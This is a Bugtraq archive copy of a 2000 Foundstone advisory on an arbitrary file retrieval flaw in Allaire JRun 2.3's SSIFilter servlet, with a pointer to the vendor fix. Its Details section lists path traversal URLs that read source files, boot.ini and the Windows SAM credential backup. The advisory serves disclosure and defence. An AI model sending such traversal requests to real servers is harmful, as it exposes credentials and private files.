Bugtraq mailing list archives
Allaire JRUN 2.3 Arbitrary File Retrieval
From: Foundstone Labs <labs () FOUNDSTONE COM>
Date: Mon, 23 Oct 2000 11:28:28 -0700
Foundstone, Inc. http://www.foundstone.com "Securing the Dot Com World" Security Advisory Allaire JRUN 2.3 ---------------------------------------------------------------------- FS Advisory ID: FS-102300-13-JRUN Release Date: October 23, 2000 Product: Allaire JRUN 2.3 Vendor: Allaire Inc. (http://www.allaire.com) Vendor Advisory: http://www.allaire.com/security/ Type: Arbitrary File Retrieval Severity: High Author: Shreeraj Shah (shreeraj.shah () foundstone com) Saumil Shah (saumil.shah () foundstone com) Stuart McClure (stuart.mcclure () foundstone com) Foundstone, Inc. (http://www.foundstone.com) Operating Systems: All operating systems supported by JRUN Vulnerable versions: JRUN Server v2.3 Foundstone Advisory: http://www.foundstone.com/cgi-bin/display.cgi?Section_ID=13 ---------------------------------------------------------------------- Description Multiple show code vulnerabilities exist in Allaire's JRUN Server 2.3 allowing an attacker to view the source code of any file within the web document root of the web server. Using the same vulnerability, it is also possible to retrieve arbitrary files that lie outside the web document root on the host operating system's file system. Details JRun 2.3 uses Java Servlets to handle parsing of various types of pages (for example, HTML, JSP, etc). Based on the settings in the rules.properties and servlets.properties files, it is possible to invoke any servlet using the URL prefix "/servlet/". It is possible to use JRun's SSIFilter servlet to retrieve arbitrary files on the target system. The following two examples show the URLs that can be used to retrieve any arbitrary files: http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../t est.jsp http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../. ./../../../../boot.ini http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../. ./../../../../winnt/repair/sam._ http://jrun:8000/servlet/ssifilter/../../test.jsp http://jrun:8000/servlet/ssifilter/../../../../../../../boot.ini http://jrun:8000/servlet/ssifilter/../../../../../../../winnt/repair/sam._ Note: It is assumed that JRun runs on host "jrun", port 8000. Solution Follow the recommendations given in Allaire Security Bulletin ASB00-28, available at: http://www.allaire.com/security/ Credits We would also like to thank Allaire for their prompt reaction to this problem and their co-operation in heightening security awareness in the security community. Disclaimer The information contained in this advisory is the copyright (C) 2000 of Foundstone, Inc. and believed to be accurate at the time of printing, but no representation or warranty is given, express or implied, as to its accuracy or completeness. Neither the author nor the publisher accepts any liability whatsoever for any direct, indirect or conquential loss or damage arising in any way from any use of, or reliance placed on, this information for any purpose. This advisory may be redistributed provided that no fee is assigned and that the advisory is not modified in any way.
Current thread:
- Allaire JRUN 2.3 Arbitrary File Retrieval Foundstone Labs (Oct 24)